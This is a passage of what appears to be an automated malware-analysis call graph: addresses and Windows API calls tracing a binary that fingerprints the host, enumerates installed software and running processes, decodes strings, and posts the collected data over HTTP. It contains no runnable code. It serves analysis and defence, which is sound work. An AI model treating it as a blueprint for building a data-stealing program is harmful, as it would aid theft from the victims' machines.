14803 4b4cf6 14802->14803 14804 4ca8a0 lstrcpy 14803->14804 14805 4b4cff 14804->14805 14806 4ca9b0 4 API calls 14805->14806 14807 4b4d1f 14806->14807 14808 4ca8a0 lstrcpy 14807->14808 14809 4b4d28 14808->14809 14810 4ca9b0 4 API calls 14809->14810 14811 4b4d47 14810->14811 14812 4ca8a0 lstrcpy 14811->14812 14813 4b4d50 14812->14813 14814 4ca920 3 API calls 14813->14814 14815 4b4d6e 14814->14815 14816 4ca8a0 lstrcpy 14815->14816 14817 4b4d77 14816->14817 14818 4ca740 lstrcpy 14817->14818 14819 4b4d92 14818->14819 14820 4ca920 3 API calls 14819->14820 14821 4b4db3 14820->14821 14822 4ca920 3 API calls 14821->14822 14823 4b4dba 14822->14823 14824 4ca8a0 lstrcpy 14823->14824 14825 4b4dc6 14824->14825 14826 4b4de7 lstrlen 14825->14826 14827 4b4dfa 14826->14827 14828 4b4e03 lstrlen 14827->14828 15765 4caad0 14828->15765 14830 4b4e13 HttpSendRequestA 14831 4b4e32 InternetReadFile 14830->14831 14832 4b4e67 InternetCloseHandle 14831->14832 14837 4b4e5e 14831->14837 14835 4ca800 14832->14835 14834 4ca9b0 4 API calls 14834->14837 14835->14757 14836 4ca8a0 lstrcpy 14836->14837 14837->14831 14837->14832 14837->14834 14837->14836 15772 4caad0 14838->15772 14840 4c17c4 StrCmpCA 14841 4c17cf ExitProcess 14840->14841 14842 4c17d7 14840->14842 14843 4c19c2 14842->14843 14844 4c18ad StrCmpCA 14842->14844 14845 4c18cf StrCmpCA 14842->14845 14846 4c185d StrCmpCA 14842->14846 14847 4c187f StrCmpCA 14842->14847 14848 4c1970 StrCmpCA 14842->14848 14849 4c18f1 StrCmpCA 14842->14849 14850 4c1951 StrCmpCA 14842->14850 14851 4c1932 StrCmpCA 14842->14851 14852 4c1913 StrCmpCA 14842->14852 14853 4ca820 lstrlen lstrcpy 14842->14853 14843->13761 14844->14842 14845->14842 14846->14842 14847->14842 14848->14842 14849->14842 14850->14842 14851->14842 14852->14842 14853->14842 14855 4ca7a0 lstrcpy 14854->14855 14856 4b5979 14855->14856 14857 4b47b0 2 API calls 14856->14857 14858 4b5985 14857->14858 14859 4ca740 lstrcpy 14858->14859 14860 4b59ba 14859->14860 14861 4ca740 lstrcpy 14860->14861 14862 4b59c7 14861->14862 14863 4ca740 lstrcpy 14862->14863 14864 4b59d4 14863->14864 14865 4ca740 lstrcpy 14864->14865 14866 4b59e1 14865->14866 14867 4ca740 lstrcpy 14866->14867 14868 4b59ee InternetOpenA StrCmpCA 14867->14868 14869 4b5a1d 14868->14869 14870 4b5fc3 InternetCloseHandle 14869->14870 14872 4c8b60 3 API calls 14869->14872 14871 4b5fe0 14870->14871 14875 4b9ac0 4 API calls 14871->14875 14873 4b5a3c 14872->14873 14874 4ca920 3 API calls 14873->14874 14876 4b5a4f 14874->14876 14877 4b5fe6 14875->14877 14878 4ca8a0 lstrcpy 14876->14878 14879 4ca820 2 API calls 14877->14879 14881 4b601f codecvt 14877->14881 14883 4b5a58 14878->14883 14880 4b5ffd 14879->14880 14882 4ca9b0 4 API calls 14880->14882 14885 4ca7a0 lstrcpy 14881->14885 14884 4b6013 14882->14884 14887 4ca9b0 4 API calls 14883->14887 14886 4ca8a0 lstrcpy 14884->14886 14895 4b604f 14885->14895 14886->14881 14888 4b5a82 14887->14888 14889 4ca8a0 lstrcpy 14888->14889 14890 4b5a8b 14889->14890 14891 4ca9b0 4 API calls 14890->14891 14892 4b5aaa 14891->14892 14893 4ca8a0 lstrcpy 14892->14893 14894 4b5ab3 14893->14894 14896 4ca920 3 API calls 14894->14896 14895->13767 14897 4b5ad1 14896->14897 14898 4ca8a0 lstrcpy 14897->14898 14899 4b5ada 14898->14899 14900 4ca9b0 4 API calls 14899->14900 14901 4b5af9 14900->14901 14902 4ca8a0 lstrcpy 14901->14902 14903 4b5b02 14902->14903 14904 4ca9b0 4 API calls 14903->14904 14905 4b5b21 14904->14905 14906 4ca8a0 lstrcpy 14905->14906 14907 4b5b2a 14906->14907 14908 4ca9b0 4 API calls 14907->14908 14909 4b5b56 14908->14909 14910 4ca920 3 API calls 14909->14910 14911 4b5b5d 14910->14911 14912 4ca8a0 lstrcpy 14911->14912 14913 4b5b66 14912->14913 14914 4b5b7c InternetConnectA 14913->14914 14914->14870 14915 4b5bac HttpOpenRequestA 14914->14915 14917 4b5c0b 14915->14917 14918 4b5fb6 InternetCloseHandle 14915->14918 14919 4ca9b0 4 API calls 14917->14919 14918->14870 14920 4b5c1f 14919->14920 14921 4ca8a0 lstrcpy 14920->14921 14922 4b5c28 14921->14922 14923 4ca920 3 API calls 14922->14923 14924 4b5c46 14923->14924 14925 4ca8a0 lstrcpy 14924->14925 14926 4b5c4f 14925->14926 14927 4ca9b0 4 API calls 14926->14927 14928 4b5c6e 14927->14928 14929 4ca8a0 lstrcpy 14928->14929 14930 4b5c77 14929->14930 14931 4ca9b0 4 API calls 14930->14931 14932 4b5c98 14931->14932 14933 4ca8a0 lstrcpy 14932->14933 14934 4b5ca1 14933->14934 14935 4ca9b0 4 API calls 14934->14935 14936 4b5cc1 14935->14936 14937 4ca8a0 lstrcpy 14936->14937 14938 4b5cca 14937->14938 14939 4ca9b0 4 API calls 14938->14939 14940 4b5ce9 14939->14940 14941 4ca8a0 lstrcpy 14940->14941 14942 4b5cf2 14941->14942 14943 4ca920 3 API calls 14942->14943 14944 4b5d10 14943->14944 14945 4ca8a0 lstrcpy 14944->14945 14946 4b5d19 14945->14946 14947 4ca9b0 4 API calls 14946->14947 14948 4b5d38 14947->14948 14949 4ca8a0 lstrcpy 14948->14949 14950 4b5d41 14949->14950 14951 4ca9b0 4 API calls 14950->14951 14952 4b5d60 14951->14952 14953 4ca8a0 lstrcpy 14952->14953 14954 4b5d69 14953->14954 14955 4ca920 3 API calls 14954->14955 14956 4b5d87 14955->14956 14957 4ca8a0 lstrcpy 14956->14957 14958 4b5d90 14957->14958 14959 4ca9b0 4 API calls 14958->14959 14960 4b5daf 14959->14960 14961 4ca8a0 lstrcpy 14960->14961 14962 4b5db8 14961->14962 14963 4ca9b0 4 API calls 14962->14963 14964 4b5dd9 14963->14964 14965 4ca8a0 lstrcpy 14964->14965 14966 4b5de2 14965->14966 14967 4ca9b0 4 API calls 14966->14967 14968 4b5e02 14967->14968 14969 4ca8a0 lstrcpy 14968->14969 14970 4b5e0b 14969->14970 14971 4ca9b0 4 API calls 14970->14971 14972 4b5e2a 14971->14972 14973 4ca8a0 lstrcpy 14972->14973 14974 4b5e33 14973->14974 14975 4ca920 3 API calls 14974->14975 14976 4b5e54 14975->14976 14977 4ca8a0 lstrcpy 14976->14977 14978 4b5e5d 14977->14978 14979 4b5e70 lstrlen 14978->14979 15773 4caad0 14979->15773 14981 4b5e81 lstrlen GetProcessHeap RtlAllocateHeap 15774 4caad0 14981->15774 14983 4b5eae lstrlen 14984 4b5ebe 14983->14984 14985 4b5ed7 lstrlen 14984->14985 14986 4b5ee7 14985->14986 14987 4b5ef0 lstrlen 14986->14987 14988 4b5f04 14987->14988 14989 4b5f1a lstrlen 14988->14989 15775 4caad0 14989->15775 14991 4b5f2a HttpSendRequestA 14992 4b5f35 InternetReadFile 14991->14992 14993 4b5f6a InternetCloseHandle 14992->14993 14997 4b5f61 14992->14997 14993->14918 14995 4ca9b0 4 API calls 14995->14997 14996 4ca8a0 lstrcpy 14996->14997 14997->14992 14997->14993 14997->14995 14997->14996 15000 4c1077 14998->15000 14999 4c1151 14999->13769 15000->14999 15001 4ca820 lstrlen lstrcpy 15000->15001 15001->15000 15008 4c0db7 15002->15008 15003 4c0f17 15003->13777 15004 4c0ea4 StrCmpCA 15004->15008 15005 4c0e27 StrCmpCA 15005->15008 15006 4c0e67 StrCmpCA 15006->15008 15007 4ca820 lstrlen lstrcpy 15007->15008 15008->15003 15008->15004 15008->15005 15008->15006 15008->15007 15010 4c0f67 15009->15010 15011 4c1044 15010->15011 15012 4ca820 lstrlen lstrcpy 15010->15012 15013 4c0fb2 StrCmpCA 15010->15013 15011->13785 15012->15010 15013->15010 15015 4ca740 lstrcpy 15014->15015 15016 4c1a26 15015->15016 15017 4ca9b0 4 API calls 15016->15017 15018 4c1a37 15017->15018 15019 4ca8a0 lstrcpy 15018->15019 15020 4c1a40 15019->15020 15021 4ca9b0 4 API calls 15020->15021 15022 4c1a5b 15021->15022 15023 4ca8a0 lstrcpy 15022->15023 15024 4c1a64 15023->15024 15025 4ca9b0 4 API calls 15024->15025 15026 4c1a7d 15025->15026 15027 4ca8a0 lstrcpy 15026->15027 15028 4c1a86 15027->15028 15029 4ca9b0 4 API calls 15028->15029 15030 4c1aa1 15029->15030 15031 4ca8a0 lstrcpy 15030->15031 15032 4c1aaa 15031->15032 15033 4ca9b0 4 API calls 15032->15033 15034 4c1ac3 15033->15034 15035 4ca8a0 lstrcpy 15034->15035 15036 4c1acc 15035->15036 15037 4ca9b0 4 API calls 15036->15037 15038 4c1ae7 15037->15038 15039 4ca8a0 lstrcpy 15038->15039 15040 4c1af0 15039->15040 15041 4ca9b0 4 API calls 15040->15041 15042 4c1b09 15041->15042 15043 4ca8a0 lstrcpy 15042->15043 15044 4c1b12 15043->15044 15045 4ca9b0 4 API calls 15044->15045 15046 4c1b2d 15045->15046 15047 4ca8a0 lstrcpy 15046->15047 15048 4c1b36 15047->15048 15049 4ca9b0 4 API calls 15048->15049 15050 4c1b4f 15049->15050 15051 4ca8a0 lstrcpy 15050->15051 15052 4c1b58 15051->15052 15053 4ca9b0 4 API calls 15052->15053 15054 4c1b76 15053->15054 15055 4ca8a0 lstrcpy 15054->15055 15056 4c1b7f 15055->15056 15057 4c7500 6 API calls 15056->15057 15058 4c1b96 15057->15058 15059 4ca920 3 API calls 15058->15059 15060 4c1ba9 15059->15060 15061 4ca8a0 lstrcpy 15060->15061 15062 4c1bb2 15061->15062 15063 4ca9b0 4 API calls 15062->15063 15064 4c1bdc 15063->15064 15065 4ca8a0 lstrcpy 15064->15065 15066 4c1be5 15065->15066 15067 4ca9b0 4 API calls 15066->15067 15068 4c1c05 15067->15068 15069 4ca8a0 lstrcpy 15068->15069 15070 4c1c0e 15069->15070 15776 4c7690 GetProcessHeap RtlAllocateHeap 15070->15776 15073 4ca9b0 4 API calls 15074 4c1c2e 15073->15074 15075 4ca8a0 lstrcpy 15074->15075 15076 4c1c37 15075->15076 15077 4ca9b0 4 API calls 15076->15077 15078 4c1c56 15077->15078 15079 4ca8a0 lstrcpy 15078->15079 15080 4c1c5f 15079->15080 15081 4ca9b0 4 API calls 15080->15081 15082 4c1c80 15081->15082 15083 4ca8a0 lstrcpy 15082->15083 15084 4c1c89 15083->15084 15783 4c77c0 GetCurrentProcess IsWow64Process 15084->15783 15087 4ca9b0 4 API calls 15088 4c1ca9 15087->15088 15089 4ca8a0 lstrcpy 15088->15089 15090 4c1cb2 15089->15090 15091 4ca9b0 4 API calls 15090->15091 15092 4c1cd1 15091->15092 15093 4ca8a0 lstrcpy 15092->15093 15094 4c1cda 15093->15094 15095 4ca9b0 4 API calls 15094->15095 15096 4c1cfb 15095->15096 15097 4ca8a0 lstrcpy 15096->15097 15098 4c1d04 15097->15098 15099 4c7850 3 API calls 15098->15099 15100 4c1d14 15099->15100 15101 4ca9b0 4 API calls 15100->15101 15102 4c1d24 15101->15102 15103 4ca8a0 lstrcpy 15102->15103 15104 4c1d2d 15103->15104 15105 4ca9b0 4 API calls 15104->15105 15106 4c1d4c 15105->15106 15107 4ca8a0 lstrcpy 15106->15107 15108 4c1d55 15107->15108 15109 4ca9b0 4 API calls 15108->15109 15110 4c1d75 15109->15110 15111 4ca8a0 lstrcpy 15110->15111 15112 4c1d7e 15111->15112 15113 4c78e0 3 API calls 15112->15113 15114 4c1d8e 15113->15114 15115 4ca9b0 4 API calls 15114->15115 15116 4c1d9e 15115->15116 15117 4ca8a0 lstrcpy 15116->15117 15118 4c1da7 15117->15118 15119 4ca9b0 4 API calls 15118->15119 15120 4c1dc6 15119->15120 15121 4ca8a0 lstrcpy 15120->15121 15122 4c1dcf 15121->15122 15123 4ca9b0 4 API calls 15122->15123 15124 4c1df0 15123->15124 15125 4ca8a0 lstrcpy 15124->15125 15126 4c1df9 15125->15126 15785 4c7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15126->15785 15129 4ca9b0 4 API calls 15130 4c1e19 15129->15130 15131 4ca8a0 lstrcpy 15130->15131 15132 4c1e22 15131->15132 15133 4ca9b0 4 API calls 15132->15133 15134 4c1e41 15133->15134 15135 4ca8a0 lstrcpy 15134->15135 15136 4c1e4a 15135->15136 15137 4ca9b0 4 API calls 15136->15137 15138 4c1e6b 15137->15138 15139 4ca8a0 lstrcpy 15138->15139 15140 4c1e74 15139->15140 15787 4c7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15140->15787 15143 4ca9b0 4 API calls 15144 4c1e94 15143->15144 15145 4ca8a0 lstrcpy 15144->15145 15146 4c1e9d 15145->15146 15147 4ca9b0 4 API calls 15146->15147 15148 4c1ebc 15147->15148 15149 4ca8a0 lstrcpy 15148->15149 15150 4c1ec5 15149->15150 15151 4ca9b0 4 API calls 15150->15151 15152 4c1ee5 15151->15152 15153 4ca8a0 lstrcpy 15152->15153 15154 4c1eee 15153->15154 15790 4c7b00 GetUserDefaultLocaleName 15154->15790 15157 4ca9b0 4 API calls 15158 4c1f0e 15157->15158 15159 4ca8a0 lstrcpy 15158->15159 15160 4c1f17 15159->15160 15161 4ca9b0 4 API calls 15160->15161 15162 4c1f36 15161->15162 15163 4ca8a0 lstrcpy 15162->15163 15164 4c1f3f 15163->15164 15165 4ca9b0 4 API calls 15164->15165 15166 4c1f60 15165->15166 15167 4ca8a0 lstrcpy 15166->15167 15168 4c1f69 15167->15168 15794 4c7b90 15168->15794 15170 4c1f80 15171 4ca920 3 API calls 15170->15171 15172 4c1f93 15171->15172 15173 4ca8a0 lstrcpy 15172->15173 15174 4c1f9c 15173->15174 15175 4ca9b0 4 API calls 15174->15175 15176 4c1fc6 15175->15176 15177 4ca8a0 lstrcpy 15176->15177 15178 4c1fcf 15177->15178 15179 4ca9b0 4 API calls 15178->15179 15180 4c1fef 15179->15180 15181 4ca8a0 lstrcpy 15180->15181 15182 4c1ff8 15181->15182 15806 4c7d80 GetSystemPowerStatus 15182->15806 15185 4ca9b0 4 API calls 15186 4c2018 15185->15186 15187 4ca8a0 lstrcpy 15186->15187 15188 4c2021 15187->15188 15189 4ca9b0 4 API calls 15188->15189 15190 4c2040 15189->15190 15191 4ca8a0 lstrcpy 15190->15191 15192 4c2049 15191->15192 15193 4ca9b0 4 API calls 15192->15193 15194 4c206a 15193->15194 15195 4ca8a0 lstrcpy 15194->15195 15196 4c2073 15195->15196 15197 4c207e GetCurrentProcessId 15196->15197 15808 4c9470 OpenProcess 15197->15808 15200 4ca920 3 API calls 15201 4c20a4 15200->15201 15202 4ca8a0 lstrcpy 15201->15202 15203 4c20ad 15202->15203 15204 4ca9b0 4 API calls 15203->15204 15205 4c20d7 15204->15205 15206 4ca8a0 lstrcpy 15205->15206 15207 4c20e0 15206->15207 15208 4ca9b0 4 API calls 15207->15208 15209 4c2100 15208->15209 15210 4ca8a0 lstrcpy 15209->15210 15211 4c2109 15210->15211 15813 4c7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15211->15813 15214 4ca9b0 4 API calls 15215 4c2129 15214->15215 15216 4ca8a0 lstrcpy 15215->15216 15217 4c2132 15216->15217 15218 4ca9b0 4 API calls 15217->15218 15219 4c2151 15218->15219 15220 4ca8a0 lstrcpy 15219->15220 15221 4c215a 15220->15221 15222 4ca9b0 4 API calls 15221->15222 15223 4c217b 15222->15223 15224 4ca8a0 lstrcpy 15223->15224 15225 4c2184 15224->15225 15817 4c7f60 15225->15817 15228 4ca9b0 4 API calls 15229 4c21a4 15228->15229 15230 4ca8a0 lstrcpy 15229->15230 15231 4c21ad 15230->15231 15232 4ca9b0 4 API calls 15231->15232 15233 4c21cc 15232->15233 15234 4ca8a0 lstrcpy 15233->15234 15235 4c21d5 15234->15235 15236 4ca9b0 4 API calls 15235->15236 15237 4c21f6 15236->15237 15238 4ca8a0 lstrcpy 15237->15238 15239 4c21ff 15238->15239 15830 4c7ed0 GetSystemInfo wsprintfA 15239->15830 15242 4ca9b0 4 API calls 15243 4c221f 15242->15243 15244 4ca8a0 lstrcpy 15243->15244 15245 4c2228 15244->15245 15246 4ca9b0 4 API calls 15245->15246 15247 4c2247 15246->15247 15248 4ca8a0 lstrcpy 15247->15248 15249 4c2250 15248->15249 15250 4ca9b0 4 API calls 15249->15250 15251 4c2270 15250->15251 15252 4ca8a0 lstrcpy 15251->15252 15253 4c2279 15252->15253 15832 4c8100 GetProcessHeap RtlAllocateHeap 15253->15832 15256 4ca9b0 4 API calls 15257 4c2299 15256->15257 15258 4ca8a0 lstrcpy 15257->15258 15259 4c22a2 15258->15259 15260 4ca9b0 4 API calls 15259->15260 15261 4c22c1 15260->15261 15262 4ca8a0 lstrcpy 15261->15262 15263 4c22ca 15262->15263 15264 4ca9b0 4 API calls 15263->15264 15265 4c22eb 15264->15265 15266 4ca8a0 lstrcpy 15265->15266 15267 4c22f4 15266->15267 15838 4c87c0 15267->15838 15270 4ca920 3 API calls 15271 4c231e 15270->15271 15272 4ca8a0 lstrcpy 15271->15272 15273 4c2327 15272->15273 15274 4ca9b0 4 API calls 15273->15274 15275 4c2351 15274->15275 15276 4ca8a0 lstrcpy 15275->15276 15277 4c235a 15276->15277 15278 4ca9b0 4 API calls 15277->15278 15279 4c237a 15278->15279 15280 4ca8a0 lstrcpy 15279->15280 15281 4c2383 15280->15281 15282 4ca9b0 4 API calls 15281->15282 15283 4c23a2 15282->15283 15284 4ca8a0 lstrcpy 15283->15284 15285 4c23ab 15284->15285 15843 4c81f0 15285->15843 15287 4c23c2 15288 4ca920 3 API calls 15287->15288 15289 4c23d5 15288->15289 15290 4ca8a0 lstrcpy 15289->15290 15291 4c23de 15290->15291 15292 4ca9b0 4 API calls 15291->15292 15293 4c240a 15292->15293 15294 4ca8a0 lstrcpy 15293->15294 15295 4c2413 15294->15295 15296 4ca9b0 4 API calls 15295->15296 15297 4c2432 15296->15297 15298 4ca8a0 lstrcpy 15297->15298 15299 4c243b 15298->15299 15300 4ca9b0 4 API calls 15299->15300 15301 4c245c 15300->15301 15302 4ca8a0 lstrcpy 15301->15302 15303 4c2465 15302->15303 15304 4ca9b0 4 API calls 15303->15304 15305 4c2484 15304->15305 15306 4ca8a0 lstrcpy 15305->15306 15307 4c248d 15306->15307 15308 4ca9b0 4 API calls 15307->15308 15309 4c24ae 15308->15309 15310 4ca8a0 lstrcpy 15309->15310 15311 4c24b7 15310->15311 15851 4c8320 15311->15851 15313 4c24d3 15314 4ca920 3 API calls 15313->15314 15315 4c24e6 15314->15315 15316 4ca8a0 lstrcpy 15315->15316 15317 4c24ef 15316->15317 15318 4ca9b0 4 API calls 15317->15318 15319 4c2519 15318->15319 15320 4ca8a0 lstrcpy 15319->15320 15321 4c2522 15320->15321 15322 4ca9b0 4 API calls 15321->15322 15323 4c2543 15322->15323 15324 4ca8a0 lstrcpy 15323->15324 15325 4c254c 15324->15325 15326 4c8320 17 API calls 15325->15326 15327 4c2568 15326->15327 15328 4ca920 3 API calls 15327->15328 15329 4c257b 15328->15329 15330 4ca8a0 lstrcpy 15329->15330 15331 4c2584 15330->15331 15332 4ca9b0 4 API calls 15331->15332 15333 4c25ae 15332->15333 15334 4ca8a0 lstrcpy 15333->15334 15335 4c25b7 15334->15335 15336 4ca9b0 4 API calls 15335->15336 15337 4c25d6 15336->15337 15338 4ca8a0 lstrcpy 15337->15338 15339 4c25df 15338->15339 15340 4ca9b0 4 API calls 15339->15340 15341 4c2600 15340->15341 15342 4ca8a0 lstrcpy 15341->15342 15343 4c2609 15342->15343 15887 4c8680 15343->15887 15345 4c2620 15346 4ca920 3 API calls 15345->15346 15347 4c2633 15346->15347 15348 4ca8a0 lstrcpy 15347->15348 15349 4c263c 15348->15349 15350 4c265a lstrlen 15349->15350 15351 4c266a 15350->15351 15352 4ca740 lstrcpy 15351->15352 15353 4c267c 15352->15353 15354 4b1590 lstrcpy 15353->15354 15355 4c268d 15354->15355 15897 4c5190 15355->15897 15357 4c2699 15357->13789 16085 4caad0 15358->16085 15360 4b5009 InternetOpenUrlA 15361 4b5021 15360->15361 15362 4b502a InternetReadFile 15361->15362 15363 4b50a0 InternetCloseHandle InternetCloseHandle 15361->15363 15362->15361 15364 4b50ec 15363->15364 15364->13793 16086 4b98d0 15365->16086 15367 4c0759 15368 4c077d 15367->15368 15369 4c0a38 15367->15369 15372 4c0799 StrCmpCA 15368->15372 15370 4b1590 lstrcpy 15369->15370 15371 4c0a49 15370->15371 16262 4c0250 15371->16262 15374 4c07a8 15372->15374 15375 4c0843 15372->15375 15377 4ca7a0 lstrcpy 15374->15377 15378 4c0865 StrCmpCA 15375->15378 15379 4c07c3 15377->15379 15380 4c0874 15378->15380 15417 4c096b 15378->15417 15381 4b1590 lstrcpy 15379->15381 15382 4ca740 lstrcpy 15380->15382 15383 4c080c 15381->15383 15385 4c0881 15382->15385 15386 4ca7a0 lstrcpy 15383->15386 15384 4c099c StrCmpCA 15387 4c09ab 15384->15387 15406 4c0a2d 15384->15406 15388 4ca9b0 4 API calls 15385->15388 15389 4c0823 15386->15389 15390 4b1590 lstrcpy 15387->15390 15391 4c08ac 15388->15391 15392 4ca7a0 lstrcpy 15389->15392 15393 4c09f4 15390->15393 15394 4ca920 3 API calls 15391->15394 15395 4c083e 15392->15395 15397 4ca7a0 lstrcpy 15393->15397 15398 4c08b3 15394->15398 16089 4bfb00 15395->16089 15399 4c0a0d 15397->15399 15400 4ca9b0 4 API calls 15398->15400 15401 4ca7a0 lstrcpy 15399->15401 15402 4c08ba 15400->15402 15403 4c0a28 15401->15403 15406->13797 15417->15384 15737 4ca7a0 lstrcpy 15736->15737 15738 4b1683 15737->15738 15739 4ca7a0 lstrcpy 15738->15739 15740 4b1695 15739->15740 15741 4ca7a0 lstrcpy 15740->15741 15742 4b16a7 15741->15742 15743 4ca7a0 lstrcpy 15742->15743 15744 4b15a3 15743->15744 15744->14620 15746 4b47c6 15745->15746 15747 4b4838 lstrlen 15746->15747 15771 4caad0 15747->15771 15749 4b4848 InternetCrackUrlA 15750 4b4867 15749->15750 15750->14697 15752 4ca740 lstrcpy 15751->15752 15753 4c8b74 15752->15753 15754 4ca740 lstrcpy 15753->15754 15755 4c8b82 GetSystemTime 15754->15755 15756 4c8b99 15755->15756 15757 4ca7a0 lstrcpy 15756->15757 15758 4c8bfc 15757->15758 15758->14712 15760 4ca931 15759->15760 15761 4ca988 15760->15761 15763 4ca968 lstrcpy lstrcat 15760->15763 15762 4ca7a0 lstrcpy 15761->15762 15764 4ca994 15762->15764 15763->15761 15764->14715 15765->14830 15767 4b4eee 15766->15767 15768 4b9af9 LocalAlloc 15766->15768 15767->14718 15767->14721 15768->15767 15769 4b9b14 CryptStringToBinaryA 15768->15769 15769->15767 15770 4b9b39 LocalFree 15769->15770 15770->15767 15771->15749 15772->14840 15773->14981 15774->14983 15775->14991 15904 4c77a0 15776->15904 15779 4c1c1e 15779->15073 15780 4c76c6 RegOpenKeyExA 15781 4c7704 RegCloseKey 15780->15781 15782 4c76e7 RegQueryValueExA 15780->15782 15781->15779 15782->15781 15784 4c1c99 15783->15784 15784->15087 15786 4c1e09 15785->15786 15786->15129 15788 4c7a9a wsprintfA 15787->15788 15789 4c1e84 15787->15789 15788->15789 15789->15143 15791 4c7b4d 15790->15791 15792 4c1efe 15790->15792 15911 4c8d20 LocalAlloc CharToOemW 15791->15911 15792->15157 15795 4ca740 lstrcpy 15794->15795 15796 4c7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15795->15796 15805 4c7c25 15796->15805 15797 4c7d18 15799 4c7d1e LocalFree 15797->15799 15800 4c7d28 15797->15800 15798 4c7c46 GetLocaleInfoA 15798->15805 15799->15800 15802 4ca7a0 lstrcpy 15800->15802 15801 4ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15801->15805 15804 4c7d37 15802->15804 15803 4ca8a0 lstrcpy 15803->15805 15804->15170 15805->15797 15805->15798 15805->15801 15805->15803 15807 4c2008 15806->15807 15807->15185 15809 4c94b5 15808->15809 15810 4c9493 GetModuleFileNameExA CloseHandle 15808->15810 15811 4ca740 lstrcpy 15809->15811 15810->15809 15812 4c2091 15811->15812 15812->15200 15814 4c7e68 RegQueryValueExA 15813->15814 15815 4c2119 15813->15815 15816 4c7e8e RegCloseKey 15814->15816 15815->15214 15816->15815 15818 4c7fb9 GetLogicalProcessorInformationEx 15817->15818 15819 4c7fd8 GetLastError 15818->15819 15822 4c8029 15818->15822 15828 4c8022 15819->15828 15829 4c7fe3 15819->15829 15821 4c2194 15821->15228 15825 4c89f0 2 API calls 15822->15825 15824 4c89f0 2 API calls 15824->15821 15826 4c807b 15825->15826 15827 4c8084 wsprintfA 15826->15827 15826->15828 15827->15821 15828->15821 15828->15824 15829->15818 15829->15821 15912 4c89f0 15829->15912 15915 4c8a10 GetProcessHeap RtlAllocateHeap 15829->15915 15831 4c220f 15830->15831 15831->15242 15833 4c89b0 15832->15833 15834 4c814d GlobalMemoryStatusEx 15833->15834 15835 4c8163 15834->15835 15836 4c819b wsprintfA 15835->15836 15837 4c2289 15836->15837 15837->15256 15839 4c87fb GetProcessHeap RtlAllocateHeap wsprintfA 15838->15839 15841 4ca740 lstrcpy 15839->15841 15842 4c230b 15841->15842 15842->15270 15844 4ca740 lstrcpy 15843->15844 15845 4c8229 15844->15845 15846 4c8263 15845->15846 15847 4ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15845->15847 15850 4ca8a0 lstrcpy 15845->15850 15848 4ca7a0 lstrcpy 15846->15848 15847->15845 15849 4c82dc 15848->15849 15849->15287 15850->15845 15852 4ca740 lstrcpy 15851->15852 15853 4c835c RegOpenKeyExA 15852->15853 15854 4c83ae 15853->15854 15855 4c83d0 15853->15855 15856 4ca7a0 lstrcpy 15854->15856 15857 4c83f8 RegEnumKeyExA 15855->15857 15858 4c8613 RegCloseKey 15855->15858 15862 4c83bd 15856->15862 15860 4c860e 15857->15860 15861 4c843f wsprintfA RegOpenKeyExA 15857->15861 15859 4ca7a0 lstrcpy 15858->15859 15859->15862 15860->15858 15863 4c8485 RegCloseKey RegCloseKey 15861->15863 15864 4c84c1 RegQueryValueExA 15861->15864 15862->15313 15867 4ca7a0 lstrcpy 15863->15867 15865 4c84fa lstrlen 15864->15865 15866 4c8601 RegCloseKey 15864->15866 15865->15866 15868 4c8510 15865->15868 15866->15860 15867->15862 15869 4ca9b0 4 API calls 15868->15869 15870 4c8527 15869->15870 15871 4ca8a0 lstrcpy 15870->15871 15872 4c8533 15871->15872 15873 4ca9b0 4 API calls 15872->15873 15874 4c8557 15873->15874 15875 4ca8a0 lstrcpy 15874->15875 15876 4c8563 15875->15876 15877 4c856e RegQueryValueExA 15876->15877 15877->15866 15878 4c85a3 15877->15878 15879 4ca9b0 4 API calls 15878->15879 15880 4c85ba 15879->15880 15881 4ca8a0 lstrcpy 15880->15881 15882 4c85c6 15881->15882 15883 4ca9b0 4 API calls 15882->15883 15884 4c85ea 15883->15884 15885 4ca8a0 lstrcpy 15884->15885 15886 4c85f6 15885->15886 15886->15866 15888 4ca740 lstrcpy 15887->15888 15889 4c86bc CreateToolhelp32Snapshot Process32First 15888->15889 15890 4c875d CloseHandle 15889->15890 15891 4c86e8 Process32Next 15889->15891 15892 4ca7a0 lstrcpy 15890->15892 15891->15890 15896 4c86fd 15891->15896 15893 4c8776 15892->15893 15893->15345 15894 4ca8a0 lstrcpy 15894->15896 15895 4ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15895->15896 15896->15891 15896->15894 15896->15895 15898 4ca7a0 lstrcpy 15897->15898 15899 4c51b5 15898->15899 15900 4b1590 lstrcpy 15899->15900 15901 4c51c6 15900->15901 15916 4b5100 15901->15916 15903 4c51cf 15903->15357 15907 4c7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15904->15907 15906 4c76b9 15906->15779 15906->15780 15908 4c7765 RegQueryValueExA 15907->15908 15909 4c7780 RegCloseKey 15907->15909 15908->15909 15910 4c7793 15909->15910 15910->15906 15911->15792 15913 4c8a0c 15912->15913 15914 4c89f9 GetProcessHeap HeapFree 15912->15914 15913->15829 15914->15913 15915->15829 15917 4ca7a0 lstrcpy 15916->15917 15918 4b5119 15917->15918 15919 4b47b0 2 API calls 15918->15919 15920 4b5125 15919->15920 16076 4c8ea0 15920->16076 15922 4b5184 15923 4b5192 lstrlen 15922->15923 15924 4b51a5 15923->15924 15925 4c8ea0 4 API calls 15924->15925 15926 4b51b6 15925->15926 15927 4ca740 lstrcpy 15926->15927 15928 4b51c9 15927->15928 15929 4ca740 lstrcpy 15928->15929 15930 4b51d6 15929->15930 15931 4ca740 lstrcpy 15930->15931 15932 4b51e3 15931->15932 15933 4ca740 lstrcpy 15932->15933 15934 4b51f0 15933->15934 15935 4ca740 lstrcpy 15934->15935 15936 4b51fd InternetOpenA StrCmpCA 15935->15936 15937 4b522f 15936->15937 15938 4b58c4 InternetCloseHandle 15937->15938 15939 4c8b60 3 API calls 15937->15939 15945 4b58d9 codecvt 15938->15945 15940 4b524e 15939->15940 15941 4ca920 3 API calls 15940->15941 15942 4b5261 15941->15942 15943 4ca8a0 lstrcpy 15942->15943 15944 4b526a 15943->15944 15946 4ca9b0 4 API calls 15944->15946 15949 4ca7a0 lstrcpy 15945->15949 15947 4b52ab 15946->15947 15948 4ca920 3 API calls 15947->15948 15950 4b52b2 